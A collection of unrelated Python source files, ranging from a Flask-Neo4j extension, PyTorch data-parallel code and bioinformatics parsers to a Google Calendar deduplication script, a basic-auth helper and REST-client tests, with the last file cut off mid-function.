if 'CONNECTION_RETRY' in self.app.config:
retry = self.app.config['CONNECTION_RETRY']
retry_interval = 5
if 'RETRY_INTERVAL' in self.app.config:
retry_interval = self.app.config['RETRY_INTERVAL']
retry_count = 0
try:
self.graph_db = Graph(self.app.config['GRAPH_DATABASE'])
except SocketError as se:
log.error('SocketError: {0}'.format(se.message))
if retry:
while retry_count < 3:
log.debug('Waiting {0}secs before Connection Retry to GraphDatabaseService'.format(
retry_interval
))
time.sleep(retry_interval)
#time.sleep(1)
retry_count += 1
try:
self.graph_db = Graph(self.app.config['GRAPH_DATABASE'])
except SocketError as sse:
log.error('SocketError: {0}'.format(sse.message))
if not hasattr(self, 'index'):
self.index = {}
# add all the indexes as app attributes
if self._indexes is not None:
for i, i_type in self._indexes.iteritems():
log.debug('getting or creating graph index:{0} {1}'.format(
i, i_type
))
self.index[i] = \
self.graph_db.legacy.get_or_create_index(i_type, i)
return self.graph_db
@property
def store(self):
"""
The object graph mapping store available as a property.
Note: The property will use these configuration variables
``CONNECTION_RETRY``
``RETRY_INTERVAL``
:return: the object graph mapping store property
"""
store = ogm.Store(self.gdb)
return store
def delete_index(self, index_name):
"""
Simple delete index capability that takes only a name.
Note: uses the index_types as remembered from indexes variable given at
initialization.
:param index_name: the name of the index to delete from the database
"""
i_type = self._indexes[index_name]
self.graph_db.legacy.delete_index(content_type=i_type, index_name=index_name)
if __name__ == '__main__':
from flask import Flask
app = Flask(__name__)
app.config['GRAPH_DATABASE'] = 'http://localhost:7474/db/data/'
graph_indexes = {'Species': Node}
flask4j = Neo4j(app, graph_indexes)
print (flask4j.gdb.neo4j_version)
species_index = flask4j.index['Species']
print ('species index:', species_index)
flask4j.delete_index('Species')
|
"""
Read a directory of expression counts in ht-seq format. Each sample
should be an individual file in the directory. File names and
sample order are specified in the config file (order is determined
by order IN the config.)
This class is intended to return the raw dataframe of samples with
missing sample columns as NaN.
"""
import pandas as pd
from pathos.multiprocessing import ProcessPool
import pathlib
try:
from functools import reduce # for py3 compatibility
except ImportError:
pass
class HtSeqParser(object):
def __init__(self, nodes=2):
self.nodes = nodes
def parse_data(self, data_paths, sample_names):
"""
Read the input files from the config file and load in to a
pandas dataframe.
params
data_paths: list of file paths specified in the config. Returned
from config parse sample_names: list of sample names specified in
the config returned from config parse
"""
output = self.load_data(data_paths, sample_names)
data, ercc_df = (self.merge_dfs(output)
.pipe(self.df_cleanup)
.pipe(self.split_on_ercc))
return data, ercc_df
def load_data(self, data_paths, sample_names):
" Multiprocess load of files in to a list of dfs "
pool = ProcessPool(nodes=self.nodes)
dfs = pool.map(self.load_func, zip(data_paths, sample_names))
return dfs
@staticmethod
def load_func(data_tuple):
path, sample_name = data_tuple
return pd.read_csv(path, sep='\t', names=['gene', sample_name])
def merge_dfs(self, dfs):
return reduce(lambda x, y: pd.merge(x, y, on='gene', how='outer'), dfs)
def df_cleanup(self, df_old):
" Clean away unwanted columns, reset index, and fillna "
df = df_old.copy()
df = df[df['gene'].str.startswith('__') == False]
df.set_index('gene', inplace=True)
df.fillna(value='Nan', inplace=True)
return df
def split_on_ercc(self, df):
" Extract the ERCC data "
ercc_cols = df.index.str.startswith('ERCC-')
ercc_df = df[ercc_cols]
data = df[~ercc_cols]
return data, ercc_df
|
import torch
from torch._utils import _flatten_dense_tensors, _unflatten_dense_tensors
import torch.distributed.deprecated as dist
from torch.nn.modules import Module
from collections import defaultdict
from torch.autograd import Variable
import torch.utils.hooks
class DistributedDataParallelCPU(Module):
r"""Implements distributed data parallelism for CPU at the module level.
This module support the ``mpi``, ``gloo``, ``tcp`` backends.
This container parallelizes the application of the given module by
splitting the input across the specified devices by chunking in the batch
dimension. The module is replicated on each machine, and each such replica
handles a portion of the input. During the backwards pass, gradients from
each node are averaged.
This module could be used in conjunction with the DistributedSampler,
(see :class `torch.utils.data.distributed.DistributedSampler`)
which will load a subset of the original datset for each node with the same
batch size. So strong scaling should be configured like this:
n = 1, batch size = 128
n = 2, batch size = 64
n = 4, batch size = 32
n = 8, batch size = 16
Creation of this class requires the distributed package to be already
initialized in the process group mode
(see :func:`torch.distributed.deprecated.init_process_group`).
.. warning::
Constructor, forward method, and differentiation of the output (or a
function of the output of this module) is a distributed synchronization
point. Take that into account in case different node might be
executing different code.
.. warning::
This module assumes all parameters are registered in the model by the
time it is created. No parameters should be added nor removed later.
.. warning::
This module assumes all gradients are dense.
.. warning::
This module doesn't work with :func:`torch.autograd.grad` (i.e. it will
only work if gradients are to be accumulated in ``.grad`` attributes of
parameters).
.. note::
Parameters are broadcast between nodes in the __init__() function. The
module performs an all-reduce step on gradients and assumes that they
will be modified by the optimizer in all nodes in the same way.
.. warning::
Forward and backward hooks defined on :attr:`module` and its submodules
won't be invoked anymore, unless the hooks are initialized in the
:meth:`forward` method.
Args:
module: module to be parallelized
Example::
>>> torch.distributed.deprecated.init_process_group(world_size=4, init_method='...')
>>> net = torch.nn.DistributedDataParallelCPU(model)
"""
def __init__(self, module):
super(DistributedDataParallelCPU, self).__init__()
self.module = module
self.sync_parameters()
def allreduce_params():
if self.needs_reduction:
self.needs_reduction = False
buckets = defaultdict(list)
for param in self.module.parameters():
if param.requires_grad and param.grad is not None:
tp = type(param.data)
buckets[tp].append(param)
for bucket in buckets.values():
grads = [param.grad.data for param in bucket]
coalesced = _flatten_dense_tensors(grads)
dist.all_reduce(coalesced)
coalesced /= dist.get_world_size()
for buf, synced in zip(grads, _unflatten_dense_tensors(coalesced, grads)):
buf.copy_(synced)
for param in list(self.module.parameters()):
@torch.utils.hooks.unserializable_hook
def allreduce_hook(*unused):
Variable._execution_engine.queue_callback(allreduce_params)
if param.requires_grad:
param.register_hook(allreduce_hook)
def sync_parameters(self):
for param in self.module.parameters():
dist.broadcast(param.data, 0)
def forward(self, *inputs, **kwargs):
self.needs_reduction = True
return self.module(*inputs, **kwargs)
|
# seer2.py
# python 3.5
# Simple demo of super-basic neural-network weather prediction.
# This version is re-written and very cleaned-up.
# Chris Bugg
# Created: 2/1/15
# Updated: 3/23/17
# TODO: Add other things to track
# TODO: Add API to fetch WX data
# TODO: Create dynamic version
import random
class Seer:
# Multiplier models
rawlins_model = [.1]
laramie_model = [.1]
cheyenne_model = [.1]
# Training conditions
training_conditions_rawlins = [80]
training_conditions_laramie = [70]
training_conditions_cheyenne = [60]
# Training actual forecast
training_forecast = [75.0]
# Validation conditions
validation_conditions_rawlins = [60]
validation_conditions_laramie = [50]
validation_conditions_cheyenne = [40]
# Validation actual forecast
validation_forecast = [55.0]
# Predicted forecast
predicted_forecast = [10.0]
# Low chances, used to help randomness
low_chance = [0, 0, 0, 0.0001, -0.0001]
# Constructor
def __init__(self):
# Initial
self.initial()
# Training
self.training()
# Validation
self.validation()
# Update model values based on actual forecast
def update_model(self):
# If our prediction was too low, bump up model weights
if self.training_forecast[0] > self.predicted_forecast[0]:
self.rawlins_model[0] = self.rawlins_model[0] * 1.01 + random.choice(self.low_chance)
self.laramie_model[0] = self.laramie_model[0] * 1.01 + random.choice(self.low_chance)
self.cheyenne_model[0] = self.cheyenne_model[0] * 1.01 + random.choice(self.low_chance)
# If our prediction was too high, bump down model weights
elif self.training_forecast[0] < self.predicted_forecast[0]:
self.rawlins_model[0] = self.rawlins_model[0] * 0.99 + random.choice(self.low_chance)
self.laramie_model[0] = self.laramie_model[0] * 0.99 + random.choice(self.low_chance)
self.cheyenne_model[0] = self.cheyenne_model[0] * 0.99 + random.choice(self.low_chance)
# Make prediction based on model values
def training_predict(self):
self.predicted_forecast[0] = self.training_conditions_rawlins[0] * self.rawlins_model[0] + \
self.training_conditions_laramie[0] * self.laramie_model[0] + \
self.training_conditions_cheyenne[0] * self.cheyenne_model[0]
# Make prediction based on model values
def validation_predict(self):
self.predicted_forecast[0] = self.validation_conditions_rawlins[0] * self.rawlins_model[0] + \
self.validation_conditions_laramie[0] * self.laramie_model[0] + \
self.validation_conditions_cheyenne[0] * self.cheyenne_model[0]
# Make initial prediction based on initial values
def initial(self):
print("--Initial Run--")
# Print Current Conditions
print("Current Conditions: ")
print("Rawlins: " + str(self.training_conditions_rawlins))
print("Laramie: " + str(self.training_conditions_laramie))
print("Cheyenne: " + str(self.training_conditions_cheyenne))
# Print Predicted Forecast
print("Predicted Forecast Laramie: " + str(self.predicted_forecast))
# Print Actual Forecast
print("Actual Forecast Laramie: " + str(self.training_forecast))
# Train model based on training data
def training(self):
# Training
print("--Training...")
# Number times to train
iterations = 2000000
# Loop x times and train the model
for x in range(0, iterations):
# Updated model based on actual forecast
self.update_model()
# Update prediction values based on updated model
self.training_predict()
print("--Training Run--")
# Print Current Conditions
print("Current Conditions: ")
print("Rawlins: " + str(self.training_conditions_rawlins))
print("Laramie: " + str(self.training_conditions_laramie))
print("Cheyenne: " + str(self.training_conditions_cheyenne))
# Print Predicted Forecast
print("Predicted Forecast Laramie: " + str(self.predicted_forecast))
# Print Actual Forecast
print("Actual Forecast Laramie: " + str(self.training_forecast))
# Test models' behavior on new data
def validation(self):
# Perform Prediction based on trained model
self.validation_predict()
print("--Validation Run--")
# Print Current Conditions
print("Current Conditions: ")
print("Rawlins: " + str(self.validation_conditions_rawlins))
print("Laramie: " + str(self.validation_conditions_laramie))
print("Cheyenne: " + str(self.validation_conditions_cheyenne))
# Print Predicted Forecast
print("Predicted Forecast Laramie: " + str(self.predicted_forecast))
# Print Actual Forecast
print("Actual Forecast Laramie: " + str(self.validation_forecast))
Seer()
|
import os
import time
import glob
import re
from ..calculateError import run as calculateError
from ..loadParser.parseLabel import run as parseLabel
from ..loadParser.loadPeak import run as loadPeak
"""
These methods are common parts of learning processes which are in
learn****param.py.
"""
def parallel_learning(MAX_CORE, learning_process, learning_processes):
"""
:param MAX_CORE:
:param learning_process:
:param learning_processes:
:return:
"""
if len(learning_processes) < MAX_CORE - 1:
learning_processes.append(learning_process)
learning_process.start()
else:
keep_wait = True
while True:
time.sleep(0.1)
if not (keep_wait is True):
break
else:
for process in reversed(learning_processes):
if process.is_alive() is False:
learning_processes.remove(process)
learning_processes.append(learning_process)
learning_process.start()
keep_wait = False
break
def return_accuracy(final, kry_file, result_file, valid_set):
"""
:param final:
:param kry_file:
:param result_file:
:param valid_set:
:return:
"""
if not valid_set:
print "there are no matched validation set :p\n"
exit()
else:
if not os.path.exists(result_file):
return 0.0
peaks = loadPeak(result_file)
if kry_file is None:
error_num, label_num = calculateError(peaks, parseLabel(valid_set, result_file))
else:
error_num, label_num = 0, 0
peaks_by_chr = []
containor = []
for index in range(len(peaks)):
if not (index + 1 == len(peaks)):
if peaks[index]['chr'] != peaks[index + 1]['chr']:
containor.append(peaks[index])
peaks_by_chr.append(containor)
containor = []
else:
containor.append(peaks[index])
else:
peaks_by_chr.append(containor)
## Output for each chromosomes which have the same copy number.
for peak_by_chr in peaks_by_chr:
if len(peak_by_chr) > 0:
chromosome = peak_by_chr[0]['chr']
label = parseLabel(valid_set, result_file,input_chromosome=chromosome\
,cpNum_file_name=kry_file)
print chromosome + " ====================== "
temp_error, temp_label = calculateError(peak_by_chr, label)
error_num += temp_error
label_num += temp_label
print "============================\n"
if (temp_error is 0) and (temp_label is 0):
error_num += label
label_num += label
if os.path.isfile(result_file) and (not final):
os.remove(result_file)
elif final:
print result_file + " is stored."
else:
print "there is no result file.."
if label_num is 0:
return 0.0
if final:
print "Test Score ::" + str(1 - error_num / label_num) +"\n\n"
return (1 - error_num / label_num)
def extract_chr_cpNum(chromosome_list, input_file, control_file, cpNum_controls, cpNum_files, kry_file, test_set,
validation_set, PATH, tool_name=None):
"""
This module extracts chromosome and copy number from a input file name.
Also, it makes directories which takes result files.
It will be used in start sections of each learning sources ( learn***params.py )
:param PATH:
:param chromosome_list:
:param control_fil
:param cpNum_controls:
:param cpNum_files:
:param input_file:
:param kry_file:
:param test_set:
:param validation_set:
:param tool_name:
:return:
"""
if kry_file is None:
for label in validation_set + test_set:
chromosome_list.append(label.split(':')[0])
chromosome_list = sorted(list(set(chromosome_list)))
for chromosome in chromosome_list:
output_dir = PATH + '/'+ tool_name +'/' + chromosome + '/'
if not os.path.exists(PATH + '/'+ tool_name +'/' + chromosome):
os.makedirs(output_dir)
else:
cpNum_files = glob.glob(PATH + "/" + input_file.split(".")[0] + ".CP[1-9].bam")
cpNum_controls = glob.glob(PATH + "/" + control_file.split(".")[0] + ".CP[1-9].bam")
str_cpnum_list = []
for cp in cpNum_files:
str_cpnum_list.append(re.search("CP[1-9]", cp).group(0))
for str_cpnum in str_cpnum_list:
output_dir = PATH + '/'+ tool_name +'/' + str_cpnum + '/'
if not os.path.exists(PATH + '/'+ tool_name +'/' + str_cpnum):
os.makedirs(output_dir)
return chromosome_list, cpNum_controls, cpNum_files
|
# -*- coding: utf-8 -*-
"""
Python documentation conversion utils
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2007-2008 by Georg Brandl.
:license: BSD.
"""
import re
from docutils.nodes import make_id
from .docnodes import TextNode, EmptyNode, NodeList
def umlaut(cmd, c):
try:
if cmd == '"':
return {'o': u'ö',
'a': u'ä',
'u': u'ü',
'i': u'ï',
'O': u'Ö',
'A': u'Ä',
'U': u'Ü'}[c]
elif cmd == "'":
return {'a': u'á',
'e': u'é'}[c]
elif cmd == '~':
return {'n': u'ñ'}[c]
elif cmd == 'c':
return {'c': u'ç'}[c]
elif cmd == '`':
return {'o': u'ò'}[c]
else:
from .latexparser import ParserError
raise ParserError('invalid umlaut \\%s' % cmd, 0)
except KeyError:
from .latexparser import ParserError
raise ParserError('unsupported umlaut \\%s%s' % (cmd, c), 0)
def fixup_text(text):
return text.replace('``', '"').replace("''", '"').replace('`', "'").\
replace('|', '\\|').replace('*', '\\*')
def empty(node):
return (type(node) is EmptyNode)
def text(node):
""" Return the text for a TextNode or raise an error. """
if isinstance(node, TextNode):
return node.text
elif isinstance(node, NodeList):
restext = ''
for subnode in node:
restext += text(subnode)
return restext
from .restwriter import WriterError
raise WriterError('text() failed for %r' % node)
markup_re = re.compile(r'(:[a-zA-Z0-9_-]+:)?`(.*?)`')
def my_make_id(name):
""" Like make_id(), but strip roles first. """
return make_id(markup_re.sub(r'\2', name))
alphanum = u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
wordchars_s = alphanum + u'_.-'
wordchars_e = alphanum + u'+`(-'
bad_markup_re = re.compile(r'(:[a-zA-Z0-9_-]+:)?(`{1,2})[ ]*(.+?)[ ]*(\2)')
quoted_code_re = re.compile(r'\\`(``.+?``)\'')
paren_re = re.compile(r':(func|meth|cfunc):`(.*?)\(\)`')
def repair_bad_inline_markup(text):
# remove quoting from `\code{x}'
xtext = quoted_code_re.sub(r'\1', text)
# special: the literal backslash
xtext = xtext.replace('``\\``', '\x03')
# special: literal backquotes
xtext = xtext.replace('``````', '\x02')
# remove () from function markup
xtext = paren_re.sub(r':\1:`\2`', xtext)
ntext = []
lasti = 0
l = len(xtext)
for m in bad_markup_re.finditer(xtext):
ntext.append(xtext[lasti:m.start()])
s, e = m.start(), m.end()
if s != 0 and xtext[s-1:s] in wordchars_s:
ntext.append('\\ ')
ntext.append((m.group(1) or '') + m.group(2) + m.group(3) + m.group(4))
if e != l and xtext[e:e+1] in wordchars_e:
ntext.append('\\ ')
lasti = m.end()
ntext.append(xtext[lasti:])
return ''.join(ntext).replace('\x02', '``````').replace('\x03', '``\\``')
|
from django.db import IntegrityError
from rest_framework import exceptions
from rest_framework import serializers as ser
from api.base.exceptions import Conflict
from api.base.utils import absolute_reverse, get_user_auth
from api.base.serializers import JSONAPISerializer, LinksField, VersionedDateTimeField, RelationshipField
from osf.models import NodeRequest
from osf.utils.workflows import DefaultStates, RequestTypes
class NodeRequestSerializer(JSONAPISerializer):
class Meta:
type_ = 'node-requests'
filterable_fields = frozenset([
'creator',
'request_type',
'machine_state',
'created',
'id'
])
id = ser.CharField(source='_id', read_only=True)
request_type = ser.ChoiceField(read_only=True, required=False, choices=RequestTypes.choices())
machine_state = ser.ChoiceField(read_only=True, required=False, choices=DefaultStates.choices())
comment = ser.CharField(required=False, allow_blank=True, max_length=65535)
created = VersionedDateTimeField(read_only=True)
modified = VersionedDateTimeField(read_only=True)
date_last_transitioned = VersionedDateTimeField(read_only=True)
target = RelationshipField(
read_only=True,
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<target._id>'},
filter_key='target___id',
)
creator = RelationshipField(
read_only=True,
related_view='users:user-detail',
related_view_kwargs={'user_id': '<creator._id>'},
filter_key='creator___id',
)
links = LinksField({
'self': 'get_absolute_url',
'target': 'get_target_url'
})
def get_absolute_url(self, obj):
return absolute_reverse('requests:node-request-detail', kwargs={'request_id': obj._id, 'version': self.context['request'].parser_context['kwargs']['version']})
def get_target_url(self, obj):
return absolute_reverse('nodes:node-detail', kwargs={'node_id': obj.target._id, 'version': self.context['request'].parser_context['kwargs']['version']})
def create(self, validated_data):
raise NotImplementedError()
class NodeRequestCreateSerializer(NodeRequestSerializer):
request_type = ser.ChoiceField(required=True, choices=RequestTypes.choices())
def create(self, validated_data):
auth = get_user_auth(self.context['request'])
if not auth.user:
raise exceptions.PermissionDenied
try:
node = self.context['view'].get_node()
except exceptions.PermissionDenied:
node = self.context['view'].get_node(check_object_permissions=False)
if auth.user in node.contributors:
raise exceptions.PermissionDenied('You cannot request access to a node you contribute to.')
raise
comment = validated_data.pop('comment', '')
request_type = validated_data.pop('request_type', None)
if not request_type:
raise exceptions.ValidationError('You must specify a valid request_type.')
try:
node_request = NodeRequest.objects.create(
target=node,
creator=auth.user,
comment=comment,
machine_state=DefaultStates.INITIAL.value,
request_type=request_type
)
node_request.save()
except IntegrityError:
raise Conflict('Users may not have more than one {} request per node.'.format(request_type))
node_request.run_submit(auth.user)
return node_request
|
# Files: Permutations.py
#
# Description: Creats permutations of an entered word.
#
__author__ = 'lothilius'
import math
class Permutations():
"""This module contains functions to generate all unique permutations
of a string, and to count permutations.
"""
def countOccurrences(word):
# create a list of 26 0s to count occurrences of each
# letter.
word = word.lower()
occurs = [0]*26
for ch in word:
i = ord(ch) - ord('a')
occurs[i] += 1
return occurs
def howManyPerms(word):
"""Return the number of permutations and unique
permutations of a string.
"""
word = word.lower()
n = len(word)
# count the occurrences of each letter in word.
occurs = Permutations.countOccurrences(word)
# For any letter that recurs, the number of unique
# permutations is the totalPerms divided by the
# factorial of that count.
divisor = 1
for i in range(26):
if occurs[i] > 1:
divisor *= math.factorial(occurs[i])
totalPerms = math.factorial(n)
uniquePerms = totalPerms / divisor
return (totalPerms, uniquePerms)
# Fixed this so that it doesn't return duplicates.
def allPermsAux(word, permsSeen):
"""This is an auxiliary function that generates all
unique permutations of the input string not already in
the list permsSeen.
"""
if len(word) <=1:
yield word
else:
for perm in Permutations.allPermsAux(word[1:], permsSeen):
for i in range(len(perm)+1):
newperm = perm[:i] + word[0] + perm[i:]
if not newperm in permsSeen:
permsSeen.append(newperm)
yield newperm
def allPerms(word):
"""This function generates all unique permutations of the
input string.
"""
return Permutations.allPermsAux(word, [])
|
import numpy as np
from sympy import Rational as frac
from sympy import cos, pi, sin, sqrt
from ..helpers import article, untangle
from ._helpers import CnScheme, _s
_source = article(
authors=["A.H. Stroud"],
title="Remarks on the Disposition of Points in Numerical Integration Formulas",
journal="Mathematical Tables and Other Aids to Computation",
volume="11",
number="60",
month="oct",
year="1957",
pages="257-261",
url="https://doi.org/10.2307/2001945",
)
def stroud_1957_2(n):
r = sqrt(3) / 6
data = [
(1.0, np.array([np.full(n, 2 * r)])),
(+r, _s(n, -1, r)),
(-r, _s(n, +1, r)),
]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-2", n, weights, points, 2, _source, 1.511e-14)
def stroud_1957_3(n):
n2 = n // 2 if n % 2 == 0 else (n - 1) // 2
i_range = range(1, 2 * n + 1)
pts = [
[
[sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],
[sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],
]
for k in range(1, n2 + 1)
]
if n % 2 == 1:
sqrt3pm = np.full(2 * n, 1 / sqrt(3))
sqrt3pm[1::2] *= -1
pts.append(sqrt3pm)
pts = np.vstack(pts).T
data = [(frac(1, 2 * n), pts)]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-3", n, weights, points, 3, _source)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
from oauth2client.file import Storage
import datetime
import dateparser
import feedparser
import requests
import json
import re
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
SCOPES = 'https://www.googleapis.com/auth/calendar'
CLIENT_SECRET_FILE = 'client_secret.json'
CLIENT_CREDENTIALS_FILE = 'client_credentials.json'
APPLICATION_NAME = 'Minsk Geek Eventer'
CALENDAR = 'Minsk Geek Events'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
store = Storage(CLIENT_CREDENTIALS_FILE)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + CLIENT_CREDENTIALS_FILE)
return credentials
def main():
""""""
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
service = discovery.build('calendar', 'v3', http=http)
calendarId = 'primary'
# Fetch all calendars and get id of CALENDAR
page_token = None
while True:
calendar_list = service.calendarList().list(pageToken=page_token).execute()
for calendar_list_entry in calendar_list['items']:
if CALENDAR == calendar_list_entry["summary"]:
calendarId = calendar_list_entry["id"]
page_token = calendar_list.get('nextPageToken')
if not page_token:
break
print('Getting the already existed events')
events = []
page_token = None
while True:
eventsResult = service.events().list(
calendarId=calendarId, maxResults=2500, singleEvents=True,
orderBy='startTime', pageToken=page_token).execute()
events.extend(eventsResult.get('items', []))
page_token = eventsResult.get('nextPageToken')
if not page_token:
break
for n, event in enumerate(events):
for latest_event in events[n + 1:]:
if 'dateTime' in event['start'] and 'dateTime' in latest_event['start']:
if (event['summary'] == latest_event['summary'] and
event['start']['dateTime'] == latest_event['start']['dateTime'] ):
print("Deleting %s %s event" % (event['start']['dateTime'], event['summary']))
try:
service.events().delete(calendarId=calendarId, eventId=event['id']).execute()
continue
except Exception as e:
print(e)
continue
elif 'date' in event['start'] and 'date' in latest_event['start']:
if (event['summary'] == latest_event['summary'] and
event['start']['date'] == latest_event['start']['date'] ):
print("Deleting %s %s event" % (event['start']['date'], event['summary']))
try:
service.events().delete(calendarId=calendarId, eventId=event['id']).execute()
continue
except Exception as e:
print(e)
continue
if __name__ == '__main__':
main()
|
import logging
import six
from oioioi.base.utils.db import require_transaction
from oioioi.contests.models import Submission
from oioioi.evalmgr.models import QueuedJob
logger = logging.getLogger(__name__)
@require_transaction
def mark_job_state(environ, state, **kwargs):
"""Sets status of given environ in job queue. Additional arguments are
used to update QueuedJob object. Returns True when the status was
set, and the job should be continued, False when it ought to be
ignored.
"""
if 'submission_id' in environ:
submission = Submission.objects.filter(id=environ['submission_id'])
if submission.exists():
kwargs['submission'] = submission.get()
kwargs['state'] = state
qj, created = QueuedJob.objects.get_or_create(
job_id=environ['job_id'], defaults=kwargs
)
if not created:
if qj.state == 'CANCELLED':
qj.delete()
logger.info('Job %s cancelled.', str(environ['job_id']))
return False
else:
for k, v in six.iteritems(kwargs):
setattr(qj, k, v)
qj.save()
return True
|
"""
Basic Auth support.
Usage:
@graph.app.route("/path")
@graph.basic_auth.required
def must_be_authorized():
pass
"""
from base64 import b64encode
from flask_basicauth import BasicAuth
from microcosm.api import defaults
from werkzeug.exceptions import Unauthorized
from microcosm_flask.conventions.encoding import with_headers
def encode_basic_auth(username, password):
"""
Encode basic auth credentials.
"""
return "Basic {}".format(
b64encode(
"{}:{}".format(
username,
password,
).encode("utf-8")
).decode("utf-8")
)
class ConfigBasicAuth(BasicAuth):
"""
Basic auth decorator that pulls credentials from static configuration.
This decorator is sufficient for internal service access control, but should
not be used for anything truly sensitive.
"""
def __init__(self, app, credentials):
super(ConfigBasicAuth, self).__init__(app)
self.credentials = credentials
def check_credentials(self, username, password):
"""
Override credential checking to use configured credentials.
"""
return password is not None and self.credentials.get(username, None) == password
def challenge(self):
"""
Override challenge to raise an exception that will trigger regular error handling.
"""
response = super(ConfigBasicAuth, self).challenge()
raise with_headers(Unauthorized(), response.headers)
@defaults(
credentials=dict(
# set a default configuration but don't merge it if other config is set
__merge__=False,
default="secret",
),
)
def configure_basic_auth_decorator(graph):
"""
Configure a basic auth decorator.
"""
# use the metadata name if no realm is defined
graph.config.setdefault("BASIC_AUTH_REALM", graph.metadata.name)
return ConfigBasicAuth(
app=graph.flask,
# wrap in dict to allow lists of items as well as dictionaries
credentials=dict(graph.config.basic_auth.credentials),
)
|
# napper -- A REST Client for Python
# Copyright (C) 2016 by Yann Kaiser and contributors.
# See AUTHORS and COPYING for details.
import io
import json
import re
from .. import restspec
from ..errors import UnknownParameters
from .util import Tests
class ConfigTests(Tests):
def make_spec(self, **obj):
obj.setdefault('base_address', 'http://www.example.org')
return restspec.RestSpec.from_file(io.StringIO(json.dumps(obj)))
def test_unknown_params(self):
with self.assertWarns(UnknownParameters):
self.make_spec(
base_address="http://some.address", invalidoption=0)
def test_address(self):
spec = self.make_spec(base_address="http://an.address.com")
self.assertEqual(spec.address, "http://an.address.com")
def test_address_trailing(self):
spec = self.make_spec(base_address="http://an.address.com/")
self.assertEqual(spec.address, "http://an.address.com")
def test_permalink_attr_suffix(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"}, {"matches": {"suffix": "_url"}}])
self.assertTrue(
spec.is_permalink_attr("https://...", {"attribute": "abcd_url"}))
self.assertFalse(
spec.is_permalink_attr("https://...", {"attribute": "abcd"}))
def test_permalink_attr_prefix(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"}, {"matches": {"prefix": "link_"}}])
self.assertTrue(
spec.is_permalink_attr("https://...", {"attribute": "link_abcd"}))
self.assertFalse(
spec.is_permalink_attr("https://...", {"attribute": "abcd"}))
def test_permalink_attr_prefix_suffix(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"}, {"matches": {"prefix": "link_",
"suffix": "_url"}}])
self.assertTrue(spec.is_permalink_attr(
"https://...", {"attribute": "link_abcd_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "link_abcd"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "abcd_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "abcd"}))
def test_permalink_attr_pattern(self):
spec = self.make_spec(permalink_attribute=[
{"context": "attribute"},
{"matches": {"pattern": "^link_[0-9]+_url$"}}])
self.assertTrue(spec.is_permalink_attr(
"https://...", {"attribute": "link_4_url"}))
self.assertTrue(spec.is_permalink_attr(
"https://...", {"attribute": "link_123456_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "link_abcd_url"}))
self.assertFalse(spec.is_permalink_attr(
"https://...", {"attribute": "1234567"}))
class FetcherTests(Tests):
def f(self, obj):
obj = json.loads(json.dumps(obj), object_hook=restspec.WarnOnUnusedKeys)
return restspec.Fetcher.from_restspec(obj)
def nv(self):
return self.assertRaises(restspec.NoValue)
def test_none(self):
f = self.f(None)
with self.nv():
f({})
with self.nv():
f("abc")
with self.nv():
f({"spam": "ham"})
r = {"spam": "ham"}
with self.nv():
f("ham", {"parent": r, "key": "spam", "root": r})
def test_missing_action(self):
with self.assertRaises(ValueError):
self.f({})
def test_multiple_actions(self):
with self.assertRaises(ValueError):
self.f({'attr': 'abc', 'value': 42})
def test_implicit_value(self):
self.assertEqual(None, self.f([None])({}))
self.assertEqual(0, self.f(0)({}))
self.assertEqual(42, self.f(42)({}))
self.assertEqual('ham', self.f('ham')({}))
self.assertEqual(['item1', 'item2'], self.f([['item1', 'item2']])({}))
def test_value(self):
self.assertEqual(None, self.f({'value': None})({}))
self.assertEqual(0, self.f({'value': 0})({}))
self.assertEqual('ham', self.f({'value': 'ham'})({}))
self.assertEqual({'a': 0}, self.f({'value': {'a': 0}})({}))
self.assertEqual('always', self.f('always')({}))
self.assertEqual('never', self.f('never')({}))
def test_attribute(self):
f = self.f({'attr': 'spam'})
self.assertEqual('ham', f({'spam': 'ham', 'eggs': '42'}))
with self.nv():
f({'eggs': '42'})
with self.nv():
f('str doesnt have attrs')
def test_attribute_indirection(self):
f = self.f({'attr': {'attr': 'eggs'}})
self.assertEqual('spam', f({'eggs': 'ham', 'ham': 'spam'}))
with self.nv():
f({'ham': 'spam'})
with self.nv():
f({'eggs': 'ham'})
def test_deep_attribute(self):
f = self.f([{'attr': 'spam'}, {'attr': 'ham'}])
self.assertEqual('eggs', f({'spam': {'ham': 'eggs'}}))
with self.nv():
f('str doesnt have attrs')
def test_item(self):
fixt = ['spam', 'ham', 'eggs']
self.assertEqual('spam', self.f({'item': 0})(fixt))
self.assertEqual('ham', self.f({'item': 1})(fixt))
self.assertEqual('eggs', self.f({'item': 2})(fixt))
self.assertEqual('spam', self.f({'item': -3})(fixt))
self.assertEqual('ham', self.f({'item': -2})(fixt))
self.assertEqual('eggs', self.f({'item': -1})(fixt))
with self.nv():
self.f({'item': 3})(fixt)
with self.nv():
self.f({'item': -4})(fixt)
def test_format(self):
